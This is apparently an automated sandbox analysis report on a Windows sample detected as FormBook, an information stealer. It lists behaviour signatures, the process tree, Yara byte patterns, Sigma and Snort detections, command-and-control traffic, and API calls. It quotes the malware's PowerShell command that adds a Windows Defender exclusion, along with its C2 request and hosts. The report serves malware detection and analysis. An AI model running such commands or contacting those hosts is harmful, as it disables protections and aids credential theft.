Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe

Overview

General Information

Sample name:03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
renamed because original name is a hash value
Original sample name:03.07.2024-sipari UG01072410 -onka ve Tic a.s.exe
Analysis ID:1467080
MD5:22f3e4a1d074aec6cbc7314efd0f53e0
SHA1:169c6970364d5f8b75efe451a38d7a91b1b47f6b
SHA256:2d6eb4f35570a71972008b6f1e3572aaab6d0ef97e19c42dbc68aeb57b670964
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Deletes itself after installation
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses shutdown.exe to shutdown or reboot the system
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe (PID: 7524 cmdline: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe" MD5: 22F3E4A1D074AEC6CBC7314EFD0F53E0)
    • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe (PID: 7736 cmdline: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe" MD5: 22F3E4A1D074AEC6CBC7314EFD0F53E0)
      • zkhJmzWnNnFLoIoaAsyqpwQZ.exe (PID: 2000 cmdline: "C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • shutdown.exe (PID: 7824 cmdline: "C:\Windows\SysWOW64\shutdown.exe" MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
          • zkhJmzWnNnFLoIoaAsyqpwQZ.exe (PID: 6492 cmdline: "C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1544 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ae10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x145af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2ae10:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x145af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d5a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16d42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2e3a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17b42:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ParentProcessId: 7524, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ProcessId: 7704, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ParentProcessId: 7524, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ProcessId: 7704, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ParentImage: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ParentProcessId: 7524, ParentProcessName: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe", ProcessId: 7704, ProcessName: powershell.exe

            Snort Signatures

            Timestamp:07/03/24-17:52:48.068224
            SID:2855465
            Source Port:49715
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeReversingLabs: Detection: 28%
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeJoe Sandbox ML: detected
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: fTTh.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000000.2140611303.0000000000EAE000.00000002.00000001.01000000.0000000C.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000002.2563006189.0000000000EAE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2215943559.0000000003797000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2213972420.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: shutdown.pdbGCTL source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562237583.0000000001458000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214355002.0000000001700000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, shutdown.exe, 0000000D.00000003.2215943559.0000000003797000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003ADE000.00000040.00001000.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000003.2213972420.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2564318778.0000000003940000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: shutdown.pdb source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000005.00000002.2214174481.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000C.00000002.2562237583.0000000001458000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: fTTh.pdbSHA256x source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0324C240 FindFirstFileW,FindNextFileW,FindClose,13_2_0324C240
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 4x nop then jmp 02CD4B0Ch0_2_02CD46DE
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then xor eax, eax13_2_03239780
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 4x nop then mov ebx, 00000004h13_2_03C9053E

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49715 -> 91.195.240.19:80
            Source: Joe Sandbox ViewIP Address: 91.195.240.19 91.195.240.19
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ucdm/?j2=EKdombQUikql/e8x5w/b0WRCZZ7GjewvGt5yqJ62oMuwgaHfKWbffkwAJSwjzlHKlyNbdgTciiNebF1Tnxx1ssE7dAszzRsyY0LYOFUjrmAhIYA2gw==&NbL=5XSdkb2PqtnPh8PP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.fungusbus.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.betful.site
            Source: global trafficDNS traffic detected: DNS query: www.deviexp.com
            Source: global trafficDNS traffic detected: DNS query: www.fungusbus.com
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe, 00000000.00000002.1329890365.0000000002F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000344B000.00000004.00000020.00020000.00000000.sdmp, shutdown.exe, 0000000D.00000002.2561874080.000000000341E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000344B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: shutdown.exe, 0000000D.00000003.2489693718.000000000824A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000341E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000341E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10333NB
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000341E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000344B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: shutdown.exe, 0000000D.00000003.2493335987.0000000008318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.2563757906.0000000003700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.2561298319.0000000003230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.2563222127.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2213669414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2214051577.0000000001250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.2563650828.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2215409822.0000000001AF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.2563123525.0000000002F70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.2dbc398.1.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.7540000.3.raw.unpack, -Module-.csLarge array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Uses shutdown.exe to shutdown or reboot the system
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeProcess created: C:\Windows\SysWOW64\shutdown.exe "C:\Windows\SysWOW64\shutdown.exe"
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0042B863 NtClose,5_2_0042B863
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772B60 NtClose,LdrInitializeThunk,5_2_01772B60
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01772DF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01772C70
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017735C0 NtCreateMutant,LdrInitializeThunk,5_2_017735C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01774340 NtSetContextThread,5_2_01774340
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01774650 NtSuspendThread,5_2_01774650
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772BF0 NtAllocateVirtualMemory,5_2_01772BF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772BE0 NtQueryValueKey,5_2_01772BE0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772BA0 NtEnumerateValueKey,5_2_01772BA0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772B80 NtQueryInformationFile,5_2_01772B80
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772AF0 NtWriteFile,5_2_01772AF0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772AD0 NtReadFile,5_2_01772AD0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772AB0 NtWaitForSingleObject,5_2_01772AB0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772D30 NtUnmapViewOfSection,5_2_01772D30
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772D10 NtMapViewOfSection,5_2_01772D10
